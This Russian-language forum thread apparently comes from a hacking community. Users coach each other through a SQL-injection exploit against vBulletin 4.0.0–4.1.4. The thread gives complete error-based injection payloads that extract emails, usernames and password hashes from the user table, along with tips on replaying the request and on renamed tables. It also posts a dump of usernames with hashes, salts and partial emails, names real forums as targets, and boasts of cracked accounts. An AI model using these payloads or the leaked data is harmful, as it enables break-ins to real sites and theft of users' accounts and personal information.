Обсуждение\вопросы Уязвимость vBulletin 4.0.0-4.1.4

[SyavaK]

Цитата: Сообщение от 3a4eT в ручную добавляй

вотэтого и боялся (
а если база 30к+ ?

есть какието символы которые неиспользуются в соли ?
просто можна было бы сменить разделитель на этот символ )

комунибуть такое попадалось ?

Цитата: sakura:0xf1261015e8b34b333fbdb78f4375ef08::[Ссылки могут видеть только зарегистрированные пользователи. ] manz007:0xa7face3e6e06fd71f98e9c143e1d42e7::manz_j [Ссылки могут видеть только зарегистрированные пользователи. ] manz_007:0xa0f02beb07c7e5e852af716d18b41abb::manz_ [Ссылки могут видеть только зарегистрированные пользователи. ] katak789:0x3a2ea443ebbdc80553d50615fc5f7333::alria [Ссылки могут видеть только зарегистрированные пользователи. ] wanam123:0x409843c42519b37a232883db4d0e1660::wanam [Ссылки могут видеть только зарегистрированные пользователи. ] castle3:0x20b2317fb7b5eb051681aa518551b15c::anyloh @yahoo.com.sg castle4:0x4a111eb3de49620c6871a54f7a8f19f9::anyloh @yahoo.com.sg triedge:0x528eb3a3873318d88c0c132f6608711b::riezer [Ссылки могут видеть только зарегистрированные пользователи. ] mofumofu:0xec78ad29a5886aff0f963b469634dfe5::merid [Ссылки могут видеть только зарегистрированные пользователи. ] srdejoker:0xd15bb78421e149879e6cd9dedbfb7de5::ange [Ссылки могут видеть только зарегистрированные пользователи. ] pager82:0xce6f5dc249b3ea1e2e6a1811c6e28e91::agus@y ahoo.com fajar06:0xb7fed1969b65507ad21a2c7c3f32ca40::riyyuk [Ссылки могут видеть только зарегистрированные пользователи. ]

соли нет вообще, хеш смахивает на хекс, удалил 0х попробовал как мд5 из 10к ток 20 акков розшифровало по словарям )


кстати мож кому нужно
это запрос на мыло

Цитата: securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select email from user where userid=1 and row(1,1)>(select count(*),concat( (select user.email) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

это запрос на юзернейм

Цитата: securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select username from user where userid=1 and row(1,1)>(select count(*),concat( (select user.username) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

[Excellent18rus]

пробелов в хешах\соли быть не должно...
убирай блокнотом

[SyavaK]

Цитата: Сообщение от Excellent18rus пробелов в хешах\соли быть не должно... убирай блокнотом

ты эт к чему ? у меня вродь нигде пробелов нет )

[Excellent18rus]

Цитата: так и загружаю [email protected]:f5de53adcccdb58f51dd58e7972890d4:T9LW6)e:L&&5tQ?~ (gbcyKES_lS`EE

я тут увидел пробел
с ним не расшифруешь

и у меня нормально загружается , даже если в соли есть :

[SyavaK]

00000000000000000000000000000000000000000000000000 0000000000

у меня всё без пробелов , это сам форум вставляет пробелы если слово длинное какнить попробуй , выше я написал 60 нулей без пробелов
с солью розобрался пасворд про делил соль, у мнея (3.1.1.0)
поменял разделитель : на № такой знак в соли пока не встречался

[3a4eT]

а что если нет таблицы? то никак незя?
например:
Ошибка MySQL: Table '****_forum.user' doesn't exist

[SyavaK]

думаю таблица есть полюбому просто по другому называется
и тут нужно вписать правильное название таблицы from user
владелец сайта может назвать таблицу как хочет, просто большинство оставляют по умолчанию

скорей всего и тут нужно будет изменить concat( (select user.password)

[RayWalker]

Можно ли это всё проделать без файрфокса? Или альтернативы этому плагину нет?

[SyavaK]

если найдёш плагин к своему браузеру который сможет подменить запросы то можно
когдато тоже было задумался над этим )
в итоге просто скачал портабл версию мозилы )

Добавлено через 7 часов 10 минут
ещё одна загадка
нашёл 1 форум с этой уязвимостью
сливаю базу
хеш норм
а соль вида "pandamad1824505432"
"pandamad9476239054"
и тд слово пандамад и 10 цыфр
ктонить с таким сталкивался ? это соль ?

[Mr_R@NDOM]

Цитата: ищем POST запрос, он будет первый... жмете на него и Повтор

нашел, нажал.

Цитата: редактируете его так, чтобы у вас остался только securitytoken .... .... .... должно быть так Код: securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

редактировал, нажимаю "повтор" и 0 реакции. Что я не так делаю ?

[SyavaK]

Цитата: Сообщение от Mr_R@NDOM нашел, нажал. редактировал, нажимаю "повтор" и 0 реакции. Что я не так делаю ?

если форум уязвимый то после всего ты увидиш окно с ошибкой в коде найдеш пароль или то что ищеш
если форум НЕ уязвимый то вродь (уже непомню) ты увидиш окно розширенного поиска
вот уязвимый форум можеш потренироватся
[Ссылки могут видеть только зарегистрированные пользователи. ]

P.S. Люди в тюрьмах столько не сидят,сколько вы за компьютером
может стоит написать МЫ ))

[Mr_R@NDOM]

Цитата: Сообщение от SyavaK если форум уязвимый то после всего ты увидиш окно с ошибкой в коде найдеш пароль или то что ищеш если форум НЕ уязвимый то вродь (уже непомню) ты увидиш окно розширенного поиска вот уязвимый форум можеш потренироватся [Ссылки могут видеть только зарегистрированные пользователи. ]

Вряд ли, использую ссылки которые указал автор темы:

Код:

http://forum.l2teon.ru
http://forum.l2rx.com/
http://forum.l2teon.ru/
http://forum.l2ua.net/
http://forum.la2fire.net/
http://forum.la2freez.net/
http://forum.legionworld.ru/
http://forum.orn.su/

[SyavaK]

если есть скайп скинь в пм
покажу свой рабочий стол увидиш шаг за шагом как это делается

[Mr_R@NDOM]

Ух и бред, скачал portable firefox и все заработало.

[Excellent18rus]

я только не понял как решить проблему с префиксом...
Ошибка MySQL : Table 'udk8w846_vb.user' doesn't exist
вот выдает...
хотя я указываю таблицу user